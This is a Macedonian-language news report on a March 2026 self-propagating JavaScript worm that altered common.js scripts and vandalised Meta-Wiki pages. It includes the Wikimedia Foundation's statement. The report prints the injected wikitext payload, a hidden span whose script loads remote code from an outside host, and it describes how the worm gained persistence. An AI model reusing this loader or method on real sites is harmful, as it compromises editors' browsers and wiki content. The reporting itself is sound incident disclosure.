Wikipedia погодена од саморазмножувачки JavaScript црв што вандализираше страници

Објавено: 06.03.2026

Денес Wikimedia Foundation претрпе безбедносен инцидент откако саморазмножувачки JavaScript црв почнал да ги модифицира корисничките скрипти и да вандализира страници на Meta-Wiki.

Подоцна беше додадено и официјално соопштение од Wikimedia Foundation, како и исправка дека вандализмот се случил само на Meta-Wiki, а не на целата Wikipedia.

Уредниците првпат го пријавиле инцидентот на страницата Wikipedia Village Pump (technical), каде што корисниците забележале голем број автоматски измени кои додаваат скриени скрипти и вандализам на случајни страници.

Инженерите од Wikimedia Foundation привремено го ограничиле уредувањето на проектите додека го истражуваат нападот и почнале да ги враќаат направените промени

JavaScript црвот

Според системот за следење на проблеми на Wikimedia Foundation, инцидентот започнал откако злонамерна скрипта хостирана на Russian Wikipedia била извршена, што предизвикало глобална JavaScript скрипта на Wikipedia да биде изменета со злонамерен код.

Злонамерната скрипта била зачувана под името User:Ololoshka562/test.js [Archive], првпат поставена во март 2024 година и наводно поврзана со скрипти користени во претходни напади врз wiki проекти.

Според историјата на измени анализирана од BleepingComputer, се верува дека скриптата била извршена за првпат од сметка на вработен во Wikimedia Foundation порано денес, додека се тестирала функционалноста на корисничките скрипти. Во моментов не е познато дали скриптата била извршена намерно, случајно при тестирање или како резултат на компромитирана сметка.

Анализата на архивираната test.js скрипта од BleepingComputer покажува дека таа се саморазмножува со вметнување на злонамерни JavaScript loader-и во:

корисничката скрипта common.js на најавениот корисник
глобалната скрипта MediaWiki:Common.js на MediaWiki, која ја користат сите корисници

MediaWiki дозволува и глобални и кориснички JavaScript датотеки, како MediaWiki:Common.js и User:<username>/common.js, кои се извршуваат во прелистувачите на уредниците за прилагодување на интерфејсот на wiki.

Откако првичната test.js скрипта била вчитана во прелистувачот на уредникот, таа се обидела да измени две скрипти користејќи ја сесијата и привилегиите на тој корисник:

корисничко ниво на постојаност: се обидела да го препише User:<username>/common.js со loader кој автоматски ќе ја вчитува test.js скриптата секогаш кога корисникот ја прелистува wiki додека е најавен
системско ниво на постојаност: ако корисникот имал соодветни привилегии, таа исто така ја менувала глобалната MediaWiki:Common.js скрипта, така што ќе се извршува за сите уредници што ја користат глобалната скрипта

Код за вметнување на самораспространувачки JavaScript црв во скриптата MediaWiki:Common.js

Ако глобалната скрипта беше успешно изменета, секој што ја вчитува би го извршил автоматски loader-от, кој потоа би ги повторил истите чекори, вклучувајќи инфицирање на сопствената common.js, како што е прикажано подолу.

Инфицирана common.js скрипта на корисник на Wikimedia

Скриптата исто така вклучува функционалност за уредување на случајна страница со барање преку командата Special:Random на wiki, а потоа уредување на страницата за да се вметне слика и следниот скриен JavaScript loader.

[[File:Woodpecker10.jpg|5000px]]
<span style="display:none">
[[#%3Cscript%3E$.getScript('//basemetrika.ru/s/e41')%3C/script%3E]]
</span>

Според анализата на BleepingComputer, приближно 3.996 страници биле изменети, а околу 85 корисници имале заменети нивни common.js датотеки за време на безбедносниот инцидент. Не е познато колку страници биле избришани.

Страници изменети од JavaScript црвот

Како што се ширеше црвот, инженерите привремено го ограничиле уредувањето на проектите додека ги враќале назад злонамерните измени и ги отстранувале референците кон вметнатите скрипти.

За време на чистењето, вработените во Wikimedia Foundation исто така ги вратиле назад common.js датотеките за бројни корисници на платформата. Овие изменети страници сега се „супримирани“ и повеќе не се видливи во историјата на измени.

Во моментот на пишување, вметнатиот код е отстранет и уредувањето повторно е возможно.

Сепак, Wikimedia Foundation сè уште не објавила детален извештај по инцидентот кој објаснува точно како била извршена заспаната скрипта или колку широко се проширил црвот пред да биде ограничен.

Wikimedia Foundation го сподели следното соопштение со BleepingComputer, наведувајќи дека кодот бил активен само 23 минути, во текот на кои изменил и избришал содржина само на Meta-Wiki, која потоа била обновена.

„Порано денес, вработените во Wikimedia Foundation вршеа безбедносна проверка на кориснички создаден код на Wikipedia. За време на таа проверка, активиравме заспан код кој потоа беше брзо идентификуван како злонамерен. Како превентивна мерка, привремено го оневозможивме уредувањето на Wikipedia и другите проекти на Wikimedia додека го отстранивме злонамерниот код и потврдивме дека веб-страницата е безбедна за корисничка активност. Безбедносниот проблем зад ова нарушување сега е решен.

Кодот беше активен 23 минути. Во текот на тој период, тој измени и избриша содржина на Meta-Wiki – која сега се обновува – но не предизвика трајна штета. Немаме докази дека Wikipedia беше под напад, ниту дека лични информации беа компромитирани како дел од овој инцидент. Развиваме дополнителни безбедносни мерки за да го минимизираме ризикот од ваков тип инциденти во иднина. Ажурирања продолжуваат да се објавуваат преку јавниот дневник на инциденти на Фондацијата.“

Извори:

Bleeping Computer – Wikipedia hit by self-propagating JavaScript worm that vandalized pages Bleeping Computer